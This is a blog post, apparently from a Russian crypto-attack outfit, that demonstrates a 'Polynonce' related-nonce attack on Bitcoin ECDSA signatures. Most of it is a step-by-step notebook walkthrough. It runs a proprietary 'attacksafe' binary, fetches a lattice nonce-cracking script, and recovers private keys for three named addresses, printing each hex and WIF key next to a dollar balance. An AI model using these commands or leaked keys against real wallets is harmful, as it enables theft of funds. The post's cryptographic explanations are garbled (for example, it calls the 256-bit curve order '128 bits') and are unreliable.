Sirwin
Sirwin

POLYNONCE ATTACK we use BITCOIN signatures as a Polynomial to an arbitrarily high power of 128 bits to get a Private Key

By CryptoDeep | CRYPTODEEP | 17 Aug 2023


CRYPTO DEEP TECH

In this article, we will again touch on the topic: “Bitcoin’s Critical Vulnerability” and use the brand new attack of 2023 “POLYNONCE ATTACK” on all three examples . The very first mention of this attack is described in an article from “Kudelski Security” .

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key https://research.kudelskisecurity.com/2023/03/06/polynonce-a-tale-of-a-novel-ecdsa-attack-and-bitcoin-tears/

As a practical basis, we will take materials from our earlier article “ Speed ​​up secp256k1 with endomorphism” where the values ​​​​on the secp256k1 curve from Hal Finney   LAMBDA and BETA hide the depth of uncertainty of Bitcoin elliptic curves.

We can reveal a lotBinary number (4 digits): "1111" // Hex number"F" //

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key https://www.rapidtables.com/convert/number/hex-to-binary.html

We also know perfectly well the order of the secp256k1 curve which consists of 128 bits Binary number (4 digits): “1111” // Hex number: “F” //

n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111010111010101011101101110011100110101011110100100010100000001110111011111111010010010111101000110011010000001101100100000101000001

We see that the polynomial as a unit in the binary code of an arbitrarily high degree of 128 bits modulo

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Speed ​​up secp256k1 with endomorphism


Given this fact, the initial bit of the Bitcoin private key will be Binary number (4 digits): “1111” // Hex number: “F” //


For a theoretical basis, we will take materials:

“Polynonce Attack on Bitcoin”

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key https://attacksafe.ru/polynonce-attack-on-bitcoin

Consider an example with a Bitcoin Address:

1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

929d565c386a279cf7a0382ba48cab1f72d62e7cfb3ab97b4f211d5673bc4441

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

RawTX

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000

Let’s go to the official website:  https://colab.research.google.com

Select the option  “Upload notebook”

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Download the file:  POLYNONCE_ATTACK.ipynb


POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Load HEXthe -data through the utility echo and save it to a file: RawTX.txt

!echo '02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000' > RawTX.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

To implement the attack, we will use the software

 “ATTACKSAFE SOFTWARE”

Implement Frey-Rück Attack to get the secret key "K" (NONCE) www.attacksafe.ru/software

Access rights:

!chmod +x attacksafe

ls

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Application:

!./attacksafe -help

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

  -version:  software version 
  -list:     list of bitcoin attacks
  -tool:     indicate the attack
  -gpu:      enable gpu
  -time:     work timeout
  -server:   server mode
  -port:     server port
  -open:     open file
  -save:     save file
  -search:   vulnerability search
  -stop:     stop at mode
  -max:      maximum quantity in mode
  -min:      minimum quantity per mode
  -speed:    boost speed for mode
  -range:    specific range
  -crack:    crack mode
  -field:    starting field
  -point:    starting point
  -inject:   injection regimen
  -decode:   decoding mode

!./attacksafe -version

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Version 5.3.3. [ATTACKSAFE SOFTWARE, © 2023]

"ATTACKSAFE SOFTWARE" includes all popular attacks on Bitcoin.

Let’s run a list of all attacks:

!./attacksafe -list

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s choose -tool: polynonce_attack

To get a specific HEXvalue R,S,Zfor the signature ECDSA, we previously added data  RawTX through the utility echoto a text document and saved it as a file RawTX.txt

02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000

Launch  -tool polynonce_attack using software “ATTACKSAFE SOFTWARE”


!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

We launched this attack from  -tool polynonce_attack and the result was saved to a file SignatureRSZ.csv

Now to see the successful result, open the file SignatureRSZ.csv


POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

In order to calculate the private key to a Bitcoin Wallet from a file,  SignatureRSZ.csvwe will install SageMath

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Earlier we published an article , download  tar-file:  sage-9.3-Ubuntu_20.04-x86_64.tar.bz2


!wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2
!tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s go through the directory:

cd SageMath/

ls

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Run  relocate-once.py  with the command:Python-script: 

!python3 relocate-once.py

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Move "AttackSafe"to "SignatureRSZ.csv"folder"SageMath"

!mv '/content/attacksafe' '/content/SageMath/attacksafe'
!mv '/content/SignatureRSZ.csv' '/content/SageMath/SignatureRSZ.csv'

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

ls

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Download the script crack_weak_ECDSA_nonces_with_LLL.py from Dario Clavijo through the utility wget

!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/20PolynonceAttack/crack_weak_ECDSA_nonces_with_LLL.py

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Now let’s run  SageMath the command:


!./sage -sh

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

To calculate the private key to the Bitcoin Wallet, run the script crack_weak_ECDSA_nonces_with_LLL.py specifying the parameters128 bits 4 sign

python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt

cat PrivateKey.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s open the file:PrivateKey.txt

We received the private key to the Bitcoin Wallet in HEXthe format

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

PrivKey = 0xf0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d

Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example1/POLYNONCE.py

Result:

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

We received four identical initial128 bits

POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 f88ff4c8a9ea4b61b1e087d0c0988826
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 6849e83cd03d103bcc37aca8323c8d2f
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe

Thanks to the value on the secp256k1 curve from  Hal Finney   LAMBDA and BETA revealed to us the same initial bits 128 bits, since the initial bits of the private key to the Bitcoin Wallet begin withBinary number (4 digits): "1111" // Hex number: "F" //


Let’s check the HEX of the private key:

Install the modulebitcoin

!pip3 install bitcoin

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s run the code:

from bitcoin import *

with open("PrivateKey.txt","r") as f:
    content = f.readlines()

content = [x.strip() for x in content]
f.close()


outfile = open("PrivateKeyAddr.txt","w")
for x in content:
  outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n")
 
outfile.close()

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s open the file:PrivateKeyAddr.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d:1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB

Let’s open  bitaddress  and check:

ADDR: 1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB
WIF:  L5HV2GiosXifcmijGCpFWdYiMRuXh4x4JVK29urGjfAWyasBYoDX
HEX:  f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

https://www.blockchain.com/en/explorer/addresses/btc/1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB


POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

BALANCE: $ 3699.40


Let’s look at other examples:


№2


Consider example #2 with a Bitcoin Address:

137a6fqt13bhtAkGZWrgcGM98NLCotszR2

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

c1da9d117e15883ba41539f558ac870f53865ea00f68a8ff8bc7e8a9ee67099b

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

RawTX

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

Let’s remove the files from the first example:

!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv
!rm PrivateKeyAddr.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Load  HEX the -data through the utility  echo and save it to a file:  RawTX.txt

!echo '010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000' > RawTX.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Launch  -tool polynonce_attack using software “ATTACKSAFE SOFTWARE”


!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

We launched this attack from  -tool polynonce_attack and the result was saved to a file SignatureRSZ.csv

Now to see the successful result, open the file SignatureRSZ.csv


POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s run  SageMath the command:


!./sage -sh

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters 128 bits 4 sign

python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt

cat PrivateKey.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s open the file: PrivateKey.txt

We received the private key to the Bitcoin Wallet in  HEX the format

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

PrivKey = 0xff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c

Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example2/POLYNONCE.py

Result:

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

We received four identical initial128 bits

POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 c5f6da6334586ed2bdc88a05f37bcf95
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 6f82fbd847c138ab48e778135e908149
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 5541022f8aeac81e5ce62e018d1cd722
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 80e88efaff419ecd84d7ded17dc548a7

Thanks to the value on the secp256k1 curve from  Hal Finney   LAMBDA and BETA revealed to us the same initial bits 128 bits, since the initial bits of the private key to the Bitcoin Wallet begin withBinary number (4 digits): "1111" // Hex number: "F" //


Let’s check the HEX of the private key:

Let’s run the code:

from bitcoin import *

with open("PrivateKey.txt","r") as f:
    content = f.readlines()

content = [x.strip() for x in content]
f.close()


outfile = open("PrivateKeyAddr.txt","w")
for x in content:
  outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n")
 
outfile.close()

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s open the file: PrivateKeyAddr.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s open  bitaddress  and check:

ADDR: 137a6fqt13bhtAkGZWrgcGM98NLCotszR2
WIF:  L5mQfFuzR3rzLtneJ7Tcv64JrHjCpK64UN4JRdGDxCUTbQ8NfHxo
HEX:  ff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

https://www.blockchain.com/en/explorer/addresses/btc/137a6fqt13bhtAkGZWrgcGM98NLCotszR2


POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

BALANCE: $ 1133.73


Let’s look at other examples:


№3


Consider example #3 with a Bitcoin Address:

1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

fa80af660fc444d87853137506df02e5c75e8c2bf75dc44589b60356867a6d98

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

RawTX

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000

Let’s remove the files from the second example:

!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv
!rm PrivateKeyAddr.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Load  HEX the -data through the utility  echo and save it to a file:  RawTX.txt

!echo '01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000' > RawTX.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Launch  -tool polynonce_attack using software “ATTACKSAFE SOFTWARE”


!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

We launched this attack from  -tool polynonce_attack and the result was saved to a file SignatureRSZ.csv

Now to see the successful result, open the file SignatureRSZ.csv


POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s run  SageMath the command:


!./sage -sh

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters 128 bits 4 sign

python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt

cat PrivateKey.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s open the file: PrivateKey.txt

We received the private key to the Bitcoin Wallet in  HEX the format

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

PrivKey = 0xfbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf

Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example3/POLYNONCE.py

Result:

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

We received four identical initial128 bits

POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 fbc50a7158b3d9fd7fd58fe0874f20c1
POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 d4de8d539655ecf0d50fd32187c3c467
POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 6726aea1a6fd64d82dc657670352de72
POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 89df16fd387156b39adca9a92464de18

Thanks to the value on the secp256k1 curve from  Hal Finney   LAMBDA and BETA revealed to us the same initial bits 128 bits, since the initial bits of the private key to the Bitcoin Wallet begin withBinary number (4 digits): "1111" // Hex number: "F" //


Let’s check the HEX of the private key:

Let’s run the code:

from bitcoin import *

with open("PrivateKey.txt","r") as f:
    content = f.readlines()

content = [x.strip() for x in content]
f.close()


outfile = open("PrivateKeyAddr.txt","w")
for x in content:
  outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n")
 
outfile.close()

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s open the file: PrivateKeyAddr.txt

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

Let’s open  bitaddress  and check:

ADDR: 1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt
WIF:  L5f7p5bReuXLm3d7rFkpPyGQ1GNpiGuj8QuQ6rNCKXC9bs3J9GEY
HEX:  fbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf

POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

https://www.blockchain.com/en/explorer/addresses/btc/1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt


POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key

BALANCE: $ 459.24


Literature:

  • A Novel Related Nonce Attack for ECDSA, Marco Macchetti [Kudelski Security, Switzerland] (2023)
  • Gallant, Robert P., Robert J. Lambert, and Scott A. Wanston. “Faster point multiplication on elliptic curves with efficient endomorphisms” . Annual International Conference on Cryptology, pp. 190–200. Springer, Berlin, Heidelberg, (2001)
  • Hankerson, Darrell, Alfred J. Menezes, and Scott Wanston. “A Guide to Elliptic Curve Cryptography” . Computer Reviews 46, no. 1 (2005)
  • Hal Finney. bitcointalk –  “Acceleration of signature verification” . (2011)  https://bitcointalk.org/index.php?topic=3238.0
  • Blahut, Richard E.  “Cryptography and Secure Communication” . Cambridge University Press, (2014)

Source

ATTACKSAFE SOFTWARE

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/7nKs_KHtyn4

Source: https://cryptodeeptech.ru/polynonce-attack


POLYNONCE ATTACK use BITCOIN signatures as a polynomial to an arbitrarily high power of 128 bits to obtain a private key  Cryptanalysis

How do you rate this article?

7


CryptoDeep
CryptoDeep

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency


CRYPTODEEP
CRYPTODEEP

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency [email protected] - Email for all questions. The creators of the software are not responsible for the use of materials Donation Address: ♥ BTC: 1Lw2gTnMpxRUNBU85Hg4ruTwnpUPKdf3nV ♥ETH: 0xaBd66CF90898517573f19184b3297d651f7b90bf ♥ YooMoney.ru/to/410011415370470

Send a $0.01 microtip in crypto to the author, and earn yourself as you read!

20% to author / 80% to me.
We pay the tips from our rewards pool.